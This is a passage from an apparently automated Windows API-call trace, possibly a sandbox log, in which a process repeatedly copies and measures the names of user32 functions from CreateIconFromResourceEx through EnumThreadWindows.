returned="CreateIconFromResourceEx" [0092.986] lstrlenA (lpString="CREATEICONFROMRESOURCEEX") returned 24 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateIconIndirect" | out: lpString1="CreateIconIndirect") returned="CreateIconIndirect" [0092.986] lstrlenA (lpString="CREATEICONINDIRECT") returned 18 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateMDIWindowA" | out: lpString1="CreateMDIWindowA") returned="CreateMDIWindowA" [0092.986] lstrlenA (lpString="CREATEMDIWINDOWA") returned 16 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateMDIWindowW" | out: lpString1="CreateMDIWindowW") returned="CreateMDIWindowW" [0092.986] lstrlenA (lpString="CREATEMDIWINDOWW") returned 16 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateMenu" | out: lpString1="CreateMenu") returned="CreateMenu" [0092.986] lstrlenA (lpString="CREATEMENU") returned 10 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreatePopupMenu" | out: lpString1="CreatePopupMenu") returned="CreatePopupMenu" [0092.986] lstrlenA (lpString="CREATEPOPUPMENU") returned 15 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateSystemThreads" | out: lpString1="CreateSystemThreads") returned="CreateSystemThreads" [0092.986] lstrlenA (lpString="CREATESYSTEMTHREADS") returned 19 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateWindowExA" | out: lpString1="CreateWindowExA") returned="CreateWindowExA" [0092.986] lstrlenA (lpString="CREATEWINDOWEXA") returned 15 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateWindowExW" | out: lpString1="CreateWindowExW") returned="CreateWindowExW" [0092.986] lstrlenA (lpString="CREATEWINDOWEXW") returned 15 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateWindowStationA" | out: lpString1="CreateWindowStationA") returned="CreateWindowStationA" [0092.986] lstrlenA (lpString="CREATEWINDOWSTATIONA") returned 20 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateWindowStationW" | out: lpString1="CreateWindowStationW") returned="CreateWindowStationW" [0092.986] lstrlenA (lpString="CREATEWINDOWSTATIONW") returned 20 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CsrBroadcastSystemMessageExW" | out: lpString1="CsrBroadcastSystemMessageExW") returned="CsrBroadcastSystemMessageExW" [0092.986] lstrlenA (lpString="CSRBROADCASTSYSTEMMESSAGEEXW") returned 28 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CtxInitUser32" | out: lpString1="CtxInitUser32") returned="CtxInitUser32" [0092.986] lstrlenA (lpString="CTXINITUSER32") returned 13 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeAbandonTransaction" | out: lpString1="DdeAbandonTransaction") returned="DdeAbandonTransaction" [0092.987] lstrlenA (lpString="DDEABANDONTRANSACTION") returned 21 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeAccessData" | out: lpString1="DdeAccessData") returned="DdeAccessData" [0092.987] lstrlenA (lpString="DDEACCESSDATA") returned 13 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeAddData" | out: lpString1="DdeAddData") returned="DdeAddData" [0092.987] lstrlenA (lpString="DDEADDDATA") returned 10 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeClientTransaction" | out: lpString1="DdeClientTransaction") returned="DdeClientTransaction" [0092.987] lstrlenA (lpString="DDECLIENTTRANSACTION") returned 20 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeCmpStringHandles" | out: lpString1="DdeCmpStringHandles") returned="DdeCmpStringHandles" [0092.987] lstrlenA (lpString="DDECMPSTRINGHANDLES") returned 19 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeConnect" | out: lpString1="DdeConnect") returned="DdeConnect" [0092.987] lstrlenA (lpString="DDECONNECT") returned 10 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeConnectList" | out: lpString1="DdeConnectList") returned="DdeConnectList" [0092.987] lstrlenA (lpString="DDECONNECTLIST") returned 14 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeCreateDataHandle" | out: lpString1="DdeCreateDataHandle") returned="DdeCreateDataHandle" [0092.987] lstrlenA (lpString="DDECREATEDATAHANDLE") returned 19 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeCreateStringHandleA" | out: lpString1="DdeCreateStringHandleA") returned="DdeCreateStringHandleA" [0092.987] lstrlenA (lpString="DDECREATESTRINGHANDLEA") returned 22 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeCreateStringHandleW" | out: lpString1="DdeCreateStringHandleW") returned="DdeCreateStringHandleW" [0092.987] lstrlenA (lpString="DDECREATESTRINGHANDLEW") returned 22 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeDisconnect" | out: lpString1="DdeDisconnect") returned="DdeDisconnect" [0092.987] lstrlenA (lpString="DDEDISCONNECT") returned 13 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeDisconnectList" | out: lpString1="DdeDisconnectList") returned="DdeDisconnectList" [0092.987] lstrlenA (lpString="DDEDISCONNECTLIST") returned 17 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeEnableCallback" | out: lpString1="DdeEnableCallback") returned="DdeEnableCallback" [0092.987] lstrlenA (lpString="DDEENABLECALLBACK") returned 17 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeFreeDataHandle" | out: lpString1="DdeFreeDataHandle") returned="DdeFreeDataHandle" [0092.987] lstrlenA (lpString="DDEFREEDATAHANDLE") returned 17 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeFreeStringHandle" | out: lpString1="DdeFreeStringHandle") returned="DdeFreeStringHandle" [0092.987] lstrlenA (lpString="DDEFREESTRINGHANDLE") returned 19 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeGetData" | out: lpString1="DdeGetData") returned="DdeGetData" [0092.987] lstrlenA (lpString="DDEGETDATA") returned 10 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeGetLastError" | out: lpString1="DdeGetLastError") returned="DdeGetLastError" [0092.987] lstrlenA (lpString="DDEGETLASTERROR") returned 15 [0092.987] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeGetQualityOfService" | out: lpString1="DdeGetQualityOfService") returned="DdeGetQualityOfService" [0092.988] lstrlenA (lpString="DDEGETQUALITYOFSERVICE") returned 22 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeImpersonateClient" | out: lpString1="DdeImpersonateClient") returned="DdeImpersonateClient" [0092.988] lstrlenA (lpString="DDEIMPERSONATECLIENT") returned 20 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeInitializeA" | out: lpString1="DdeInitializeA") returned="DdeInitializeA" [0092.988] lstrlenA (lpString="DDEINITIALIZEA") returned 14 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeInitializeW" | out: lpString1="DdeInitializeW") returned="DdeInitializeW" [0092.988] lstrlenA (lpString="DDEINITIALIZEW") returned 14 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeKeepStringHandle" | out: lpString1="DdeKeepStringHandle") returned="DdeKeepStringHandle" [0092.988] lstrlenA (lpString="DDEKEEPSTRINGHANDLE") returned 19 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeNameService" | out: lpString1="DdeNameService") returned="DdeNameService" [0092.988] lstrlenA (lpString="DDENAMESERVICE") returned 14 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdePostAdvise" | out: lpString1="DdePostAdvise") returned="DdePostAdvise" [0092.988] lstrlenA (lpString="DDEPOSTADVISE") returned 13 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeQueryConvInfo" | out: lpString1="DdeQueryConvInfo") returned="DdeQueryConvInfo" [0092.988] lstrlenA (lpString="DDEQUERYCONVINFO") returned 16 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeQueryNextServer" | out: lpString1="DdeQueryNextServer") returned="DdeQueryNextServer" [0092.988] lstrlenA (lpString="DDEQUERYNEXTSERVER") returned 18 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeQueryStringA" | out: lpString1="DdeQueryStringA") returned="DdeQueryStringA" [0092.988] lstrlenA (lpString="DDEQUERYSTRINGA") returned 15 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeQueryStringW" | out: lpString1="DdeQueryStringW") returned="DdeQueryStringW" [0092.988] lstrlenA (lpString="DDEQUERYSTRINGW") returned 15 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeReconnect" | out: lpString1="DdeReconnect") returned="DdeReconnect" [0092.988] lstrlenA (lpString="DDERECONNECT") returned 12 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeSetQualityOfService" | out: lpString1="DdeSetQualityOfService") returned="DdeSetQualityOfService" [0092.988] lstrlenA (lpString="DDESETQUALITYOFSERVICE") returned 22 [0092.988] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeSetUserHandle" | out: lpString1="DdeSetUserHandle") returned="DdeSetUserHandle" [0092.988] lstrlenA (lpString="DDESETUSERHANDLE") returned 16 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeUnaccessData" | out: lpString1="DdeUnaccessData") returned="DdeUnaccessData" [0092.989] lstrlenA (lpString="DDEUNACCESSDATA") returned 15 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DdeUninitialize" | out: lpString1="DdeUninitialize") returned="DdeUninitialize" [0092.989] lstrlenA (lpString="DDEUNINITIALIZE") returned 15 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DefDlgProcA" | out: lpString1="DefDlgProcA") returned="DefDlgProcA" [0092.989] lstrlenA (lpString="DEFDLGPROCA") returned 11 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DefDlgProcW" | out: lpString1="DefDlgProcW") returned="DefDlgProcW" [0092.989] lstrlenA (lpString="DEFDLGPROCW") returned 11 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DefFrameProcA" | out: lpString1="DefFrameProcA") returned="DefFrameProcA" [0092.989] lstrlenA (lpString="DEFFRAMEPROCA") returned 13 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DefFrameProcW" | out: lpString1="DefFrameProcW") returned="DefFrameProcW" [0092.989] lstrlenA (lpString="DEFFRAMEPROCW") returned 13 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DefMDIChildProcA" | out: lpString1="DefMDIChildProcA") returned="DefMDIChildProcA" [0092.989] lstrlenA (lpString="DEFMDICHILDPROCA") returned 16 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DefMDIChildProcW" | out: lpString1="DefMDIChildProcW") returned="DefMDIChildProcW" [0092.989] lstrlenA (lpString="DEFMDICHILDPROCW") returned 16 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DefRawInputProc" | out: lpString1="DefRawInputProc") returned="DefRawInputProc" [0092.989] lstrlenA (lpString="DEFRAWINPUTPROC") returned 15 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DefWindowProcA" | out: lpString1="DefWindowProcA") returned="DefWindowProcA" [0092.989] lstrlenA (lpString="DEFWINDOWPROCA") returned 14 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DefWindowProcW" | out: lpString1="DefWindowProcW") returned="DefWindowProcW" [0092.989] lstrlenA (lpString="DEFWINDOWPROCW") returned 14 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DeferWindowPos" | out: lpString1="DeferWindowPos") returned="DeferWindowPos" [0092.989] lstrlenA (lpString="DEFERWINDOWPOS") returned 14 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DeleteMenu" | out: lpString1="DeleteMenu") returned="DeleteMenu" [0092.989] lstrlenA (lpString="DELETEMENU") returned 10 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DeregisterShellHookWindow" | out: lpString1="DeregisterShellHookWindow") returned="DeregisterShellHookWindow" [0092.989] lstrlenA (lpString="DEREGISTERSHELLHOOKWINDOW") returned 25 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DestroyAcceleratorTable" | out: lpString1="DestroyAcceleratorTable") returned="DestroyAcceleratorTable" [0092.989] lstrlenA (lpString="DESTROYACCELERATORTABLE") returned 23 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DestroyCaret" | out: lpString1="DestroyCaret") returned="DestroyCaret" [0092.989] lstrlenA (lpString="DESTROYCARET") returned 12 [0092.989] lstrcpyA (in: lpString1=0x49af288, lpString2="DestroyCursor" | out: lpString1="DestroyCursor") returned="DestroyCursor" [0092.990] lstrlenA (lpString="DESTROYCURSOR") returned 13 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DestroyIcon" | out: lpString1="DestroyIcon") returned="DestroyIcon" [0092.990] lstrlenA (lpString="DESTROYICON") returned 11 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DestroyMenu" | out: lpString1="DestroyMenu") returned="DestroyMenu" [0092.990] lstrlenA (lpString="DESTROYMENU") returned 11 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DestroyReasons" | out: lpString1="DestroyReasons") returned="DestroyReasons" [0092.990] lstrlenA (lpString="DESTROYREASONS") returned 14 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DestroyWindow" | out: lpString1="DestroyWindow") returned="DestroyWindow" [0092.990] lstrlenA (lpString="DESTROYWINDOW") returned 13 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DeviceEventWorker" | out: lpString1="DeviceEventWorker") returned="DeviceEventWorker" [0092.990] lstrlenA (lpString="DEVICEEVENTWORKER") returned 17 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DialogBoxIndirectParamA" | out: lpString1="DialogBoxIndirectParamA") returned="DialogBoxIndirectParamA" [0092.990] lstrlenA (lpString="DIALOGBOXINDIRECTPARAMA") returned 23 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DialogBoxIndirectParamAorW" | out: lpString1="DialogBoxIndirectParamAorW") returned="DialogBoxIndirectParamAorW" [0092.990] lstrlenA (lpString="DIALOGBOXINDIRECTPARAMAORW") returned 26 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DialogBoxIndirectParamW" | out: lpString1="DialogBoxIndirectParamW") returned="DialogBoxIndirectParamW" [0092.990] lstrlenA (lpString="DIALOGBOXINDIRECTPARAMW") returned 23 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DialogBoxParamA" | out: lpString1="DialogBoxParamA") returned="DialogBoxParamA" [0092.990] lstrlenA (lpString="DIALOGBOXPARAMA") returned 15 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DialogBoxParamW" | out: lpString1="DialogBoxParamW") returned="DialogBoxParamW" [0092.990] lstrlenA (lpString="DIALOGBOXPARAMW") returned 15 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DisableProcessWindowsGhosting" | out: lpString1="DisableProcessWindowsGhosting") returned="DisableProcessWindowsGhosting" [0092.990] lstrlenA (lpString="DISABLEPROCESSWINDOWSGHOSTING") returned 29 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DispatchMessageA" | out: lpString1="DispatchMessageA") returned="DispatchMessageA" [0092.990] lstrlenA (lpString="DISPATCHMESSAGEA") returned 16 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DispatchMessageW" | out: lpString1="DispatchMessageW") returned="DispatchMessageW" [0092.990] lstrlenA (lpString="DISPATCHMESSAGEW") returned 16 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DisplayConfigGetDeviceInfo" | out: lpString1="DisplayConfigGetDeviceInfo") returned="DisplayConfigGetDeviceInfo" [0092.990] lstrlenA (lpString="DISPLAYCONFIGGETDEVICEINFO") returned 26 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DisplayConfigSetDeviceInfo" | out: lpString1="DisplayConfigSetDeviceInfo") returned="DisplayConfigSetDeviceInfo" [0092.990] lstrlenA (lpString="DISPLAYCONFIGSETDEVICEINFO") returned 26 [0092.990] lstrcpyA (in: lpString1=0x49af288, lpString2="DisplayExitWindowsWarnings" | out: lpString1="DisplayExitWindowsWarnings") returned="DisplayExitWindowsWarnings" [0092.990] lstrlenA (lpString="DISPLAYEXITWINDOWSWARNINGS") returned 26 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DlgDirListA" | out: lpString1="DlgDirListA") returned="DlgDirListA" [0092.991] lstrlenA (lpString="DLGDIRLISTA") returned 11 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DlgDirListComboBoxA" | out: lpString1="DlgDirListComboBoxA") returned="DlgDirListComboBoxA" [0092.991] lstrlenA (lpString="DLGDIRLISTCOMBOBOXA") returned 19 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DlgDirListComboBoxW" | out: lpString1="DlgDirListComboBoxW") returned="DlgDirListComboBoxW" [0092.991] lstrlenA (lpString="DLGDIRLISTCOMBOBOXW") returned 19 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DlgDirListW" | out: lpString1="DlgDirListW") returned="DlgDirListW" [0092.991] lstrlenA (lpString="DLGDIRLISTW") returned 11 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DlgDirSelectComboBoxExA" | out: lpString1="DlgDirSelectComboBoxExA") returned="DlgDirSelectComboBoxExA" [0092.991] lstrlenA (lpString="DLGDIRSELECTCOMBOBOXEXA") returned 23 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DlgDirSelectComboBoxExW" | out: lpString1="DlgDirSelectComboBoxExW") returned="DlgDirSelectComboBoxExW" [0092.991] lstrlenA (lpString="DLGDIRSELECTCOMBOBOXEXW") returned 23 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DlgDirSelectExA" | out: lpString1="DlgDirSelectExA") returned="DlgDirSelectExA" [0092.991] lstrlenA (lpString="DLGDIRSELECTEXA") returned 15 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DlgDirSelectExW" | out: lpString1="DlgDirSelectExW") returned="DlgDirSelectExW" [0092.991] lstrlenA (lpString="DLGDIRSELECTEXW") returned 15 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DoSoundConnect" | out: lpString1="DoSoundConnect") returned="DoSoundConnect" [0092.991] lstrlenA (lpString="DOSOUNDCONNECT") returned 14 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DoSoundDisconnect" | out: lpString1="DoSoundDisconnect") returned="DoSoundDisconnect" [0092.991] lstrlenA (lpString="DOSOUNDDISCONNECT") returned 17 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DragDetect" | out: lpString1="DragDetect") returned="DragDetect" [0092.991] lstrlenA (lpString="DRAGDETECT") returned 10 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DragObject" | out: lpString1="DragObject") returned="DragObject" [0092.991] lstrlenA (lpString="DRAGOBJECT") returned 10 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawAnimatedRects" | out: lpString1="DrawAnimatedRects") returned="DrawAnimatedRects" [0092.991] lstrlenA (lpString="DRAWANIMATEDRECTS") returned 17 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawCaption" | out: lpString1="DrawCaption") returned="DrawCaption" [0092.991] lstrlenA (lpString="DRAWCAPTION") returned 11 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawCaptionTempA" | out: lpString1="DrawCaptionTempA") returned="DrawCaptionTempA" [0092.991] lstrlenA (lpString="DRAWCAPTIONTEMPA") returned 16 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawCaptionTempW" | out: lpString1="DrawCaptionTempW") returned="DrawCaptionTempW" [0092.991] lstrlenA (lpString="DRAWCAPTIONTEMPW") returned 16 [0092.991] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawEdge" | out: lpString1="DrawEdge") returned="DrawEdge" [0092.992] lstrlenA (lpString="DRAWEDGE") returned 8 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawFocusRect" | out: lpString1="DrawFocusRect") returned="DrawFocusRect" [0092.992] lstrlenA (lpString="DRAWFOCUSRECT") returned 13 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawFrame" | out: lpString1="DrawFrame") returned="DrawFrame" [0092.992] lstrlenA (lpString="DRAWFRAME") returned 9 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawFrameControl" | out: lpString1="DrawFrameControl") returned="DrawFrameControl" [0092.992] lstrlenA (lpString="DRAWFRAMECONTROL") returned 16 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawIcon" | out: lpString1="DrawIcon") returned="DrawIcon" [0092.992] lstrlenA (lpString="DRAWICON") returned 8 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawIconEx" | out: lpString1="DrawIconEx") returned="DrawIconEx" [0092.992] lstrlenA (lpString="DRAWICONEX") returned 10 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawMenuBar" | out: lpString1="DrawMenuBar") returned="DrawMenuBar" [0092.992] lstrlenA (lpString="DRAWMENUBAR") returned 11 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawMenuBarTemp" | out: lpString1="DrawMenuBarTemp") returned="DrawMenuBarTemp" [0092.992] lstrlenA (lpString="DRAWMENUBARTEMP") returned 15 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawStateA" | out: lpString1="DrawStateA") returned="DrawStateA" [0092.992] lstrlenA (lpString="DRAWSTATEA") returned 10 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawStateW" | out: lpString1="DrawStateW") returned="DrawStateW" [0092.992] lstrlenA (lpString="DRAWSTATEW") returned 10 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawTextA" | out: lpString1="DrawTextA") returned="DrawTextA" [0092.992] lstrlenA (lpString="DRAWTEXTA") returned 9 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawTextExA" | out: lpString1="DrawTextExA") returned="DrawTextExA" [0092.992] lstrlenA (lpString="DRAWTEXTEXA") returned 11 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawTextExW" | out: lpString1="DrawTextExW") returned="DrawTextExW" [0092.992] lstrlenA (lpString="DRAWTEXTEXW") returned 11 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DrawTextW" | out: lpString1="DrawTextW") returned="DrawTextW" [0092.992] lstrlenA (lpString="DRAWTEXTW") returned 9 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DwmGetDxSharedSurface" | out: lpString1="DwmGetDxSharedSurface") returned="DwmGetDxSharedSurface" [0092.992] lstrlenA (lpString="DWMGETDXSHAREDSURFACE") returned 21 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DwmStartRedirection" | out: lpString1="DwmStartRedirection") returned="DwmStartRedirection" [0092.992] lstrlenA (lpString="DWMSTARTREDIRECTION") returned 19 [0092.992] lstrcpyA (in: lpString1=0x49af288, lpString2="DwmStopRedirection" | out: lpString1="DwmStopRedirection") returned="DwmStopRedirection" [0092.992] lstrlenA (lpString="DWMSTOPREDIRECTION") returned 18 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EditWndProc" | out: lpString1="EditWndProc") returned="EditWndProc" [0092.993] lstrlenA (lpString="EDITWNDPROC") returned 11 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EmptyClipboard" | out: lpString1="EmptyClipboard") returned="EmptyClipboard" [0092.993] lstrlenA (lpString="EMPTYCLIPBOARD") returned 14 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EnableMenuItem" | out: lpString1="EnableMenuItem") returned="EnableMenuItem" [0092.993] lstrlenA (lpString="ENABLEMENUITEM") returned 14 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EnableScrollBar" | out: lpString1="EnableScrollBar") returned="EnableScrollBar" [0092.993] lstrlenA (lpString="ENABLESCROLLBAR") returned 15 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EnableWindow" | out: lpString1="EnableWindow") returned="EnableWindow" [0092.993] lstrlenA (lpString="ENABLEWINDOW") returned 12 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EndDeferWindowPos" | out: lpString1="EndDeferWindowPos") returned="EndDeferWindowPos" [0092.993] lstrlenA (lpString="ENDDEFERWINDOWPOS") returned 17 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EndDialog" | out: lpString1="EndDialog") returned="EndDialog" [0092.993] lstrlenA (lpString="ENDDIALOG") returned 9 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EndMenu" | out: lpString1="EndMenu") returned="EndMenu" [0092.993] lstrlenA (lpString="ENDMENU") returned 7 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EndPaint" | out: lpString1="EndPaint") returned="EndPaint" [0092.993] lstrlenA (lpString="ENDPAINT") returned 8 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EndTask" | out: lpString1="EndTask") returned="EndTask" [0092.993] lstrlenA (lpString="ENDTASK") returned 7 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EnterReaderModeHelper" | out: lpString1="EnterReaderModeHelper") returned="EnterReaderModeHelper" [0092.993] lstrlenA (lpString="ENTERREADERMODEHELPER") returned 21 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumChildWindows" | out: lpString1="EnumChildWindows") returned="EnumChildWindows" [0092.993] lstrlenA (lpString="ENUMCHILDWINDOWS") returned 16 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumClipboardFormats" | out: lpString1="EnumClipboardFormats") returned="EnumClipboardFormats" [0092.993] lstrlenA (lpString="ENUMCLIPBOARDFORMATS") returned 20 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumDesktopWindows" | out: lpString1="EnumDesktopWindows") returned="EnumDesktopWindows" [0092.993] lstrlenA (lpString="ENUMDESKTOPWINDOWS") returned 18 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumDesktopsA" | out: lpString1="EnumDesktopsA") returned="EnumDesktopsA" [0092.993] lstrlenA (lpString="ENUMDESKTOPSA") returned 13 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumDesktopsW" | out: lpString1="EnumDesktopsW") returned="EnumDesktopsW" [0092.993] lstrlenA (lpString="ENUMDESKTOPSW") returned 13 [0092.993] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumDisplayDevicesA" | out: lpString1="EnumDisplayDevicesA") returned="EnumDisplayDevicesA" [0092.993] lstrlenA (lpString="ENUMDISPLAYDEVICESA") returned 19 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumDisplayDevicesW" | out: lpString1="EnumDisplayDevicesW") returned="EnumDisplayDevicesW" [0092.994] lstrlenA (lpString="ENUMDISPLAYDEVICESW") returned 19 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumDisplayMonitors" | out: lpString1="EnumDisplayMonitors") returned="EnumDisplayMonitors" [0092.994] lstrlenA (lpString="ENUMDISPLAYMONITORS") returned 19 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumDisplaySettingsA" | out: lpString1="EnumDisplaySettingsA") returned="EnumDisplaySettingsA" [0092.994] lstrlenA (lpString="ENUMDISPLAYSETTINGSA") returned 20 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumDisplaySettingsExA" | out: lpString1="EnumDisplaySettingsExA") returned="EnumDisplaySettingsExA" [0092.994] lstrlenA (lpString="ENUMDISPLAYSETTINGSEXA") returned 22 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumDisplaySettingsExW" | out: lpString1="EnumDisplaySettingsExW") returned="EnumDisplaySettingsExW" [0092.994] lstrlenA (lpString="ENUMDISPLAYSETTINGSEXW") returned 22 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumDisplaySettingsW" | out: lpString1="EnumDisplaySettingsW") returned="EnumDisplaySettingsW" [0092.994] lstrlenA (lpString="ENUMDISPLAYSETTINGSW") returned 20 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumPropsA" | out: lpString1="EnumPropsA") returned="EnumPropsA" [0092.994] lstrlenA (lpString="ENUMPROPSA") returned 10 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumPropsExA" | out: lpString1="EnumPropsExA") returned="EnumPropsExA" [0092.994] lstrlenA (lpString="ENUMPROPSEXA") returned 12 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumPropsExW" | out: lpString1="EnumPropsExW") returned="EnumPropsExW" [0092.994] lstrlenA (lpString="ENUMPROPSEXW") returned 12 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumPropsW" | out: lpString1="EnumPropsW") returned="EnumPropsW" [0092.994] lstrlenA (lpString="ENUMPROPSW") returned 10 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumThreadWindows" | out: lpString1="EnumThreadWindows") returned="EnumThreadWindows" [0092.994] lstrlenA (lpString="ENUMTHREADWINDOWS") returned 17 [0092.994] lstrcpyA (in: lpString1=0x49af288, 